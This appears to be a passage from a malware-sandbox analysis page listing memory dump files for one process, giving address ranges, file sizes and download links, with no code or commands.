memory/4928-338-0x00007FFD35B90000-0x00007FFD35D0F000-memory.dmp

Filesize
1.5MB

Download
memory/4928-335-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp

Filesize
180KB

Download
memory/4928-332-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp

Filesize
6.8MB

Download
memory/4928-321-0x00007FFD34EB0000-0x00007FFD34FCA000-memory.dmp

Filesize
1.1MB

Download
memory/4928-308-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp

Filesize
148KB

Download
memory/4928-294-0x00007FFD35590000-0x00007FFD35AB9000-memory.dmp

Filesize
5.2MB

Download
memory/4928-279-0x000001C2FDEA0000-0x000001C2FE3C9000-memory.dmp

Filesize
5.2MB

Download
memory/4928-276-0x00007FFD452F0000-0x00007FFD45323000-memory.dmp

Filesize
204KB

Download
memory/4928-106-0x00007FFD45330000-0x00007FFD45354000-memory.dmp

Filesize
144KB

Download
memory/4928-79-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp

Filesize
180KB

Download
memory/4928-80-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp

Filesize
52KB

Download
memory/4928-81-0x00007FFD34EB0000-0x00007FFD34FCA000-memory.dmp

Filesize
1.1MB

Download
memory/4928-76-0x00007FFD45040000-0x00007FFD45054000-memory.dmp

Filesize
80KB

Download
memory/4928-70-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp

Filesize
6.8MB

Download
memory/4928-71-0x00007FFD35AC0000-0x00007FFD35B8D000-memory.dmp

Filesize
820KB

Download
memory/4928-72-0x000001C2FDEA0000-0x000001C2FE3C9000-memory.dmp

Filesize
5.2MB

Download
memory/4928-73-0x00007FFD35590000-0x00007FFD35AB9000-memory.dmp

Filesize
5.2MB

Download
memory/4928-74-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp

Filesize
148KB

Download
memory/4928-66-0x00007FFD452F0000-0x00007FFD45323000-memory.dmp

Filesize
204KB

Download
memory/4928-62-0x00007FFD45780000-0x00007FFD45799000-memory.dmp

Filesize
100KB

Download
memory/4928-64-0x00007FFD46500000-0x00007FFD4650D000-memory.dmp

Filesize
52KB

Download
memory/4928-60-0x00007FFD35B90000-0x00007FFD35D0F000-memory.dmp

Filesize
1.5MB

Download
memory/4928-58-0x00007FFD45330000-0x00007FFD45354000-memory.dmp

Filesize
144KB

Download
memory/4928-56-0x00007FFD45920000-0x00007FFD4593A000-memory.dmp

Filesize
104KB

Download
memory/4928-54-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp

Filesize
180KB

Download
memory/4928-48-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp

Filesize
60KB

Download
memory/4928-30-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp

Filesize
148KB

Download
memory/4928-25-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp

Filesize
6.8MB

Download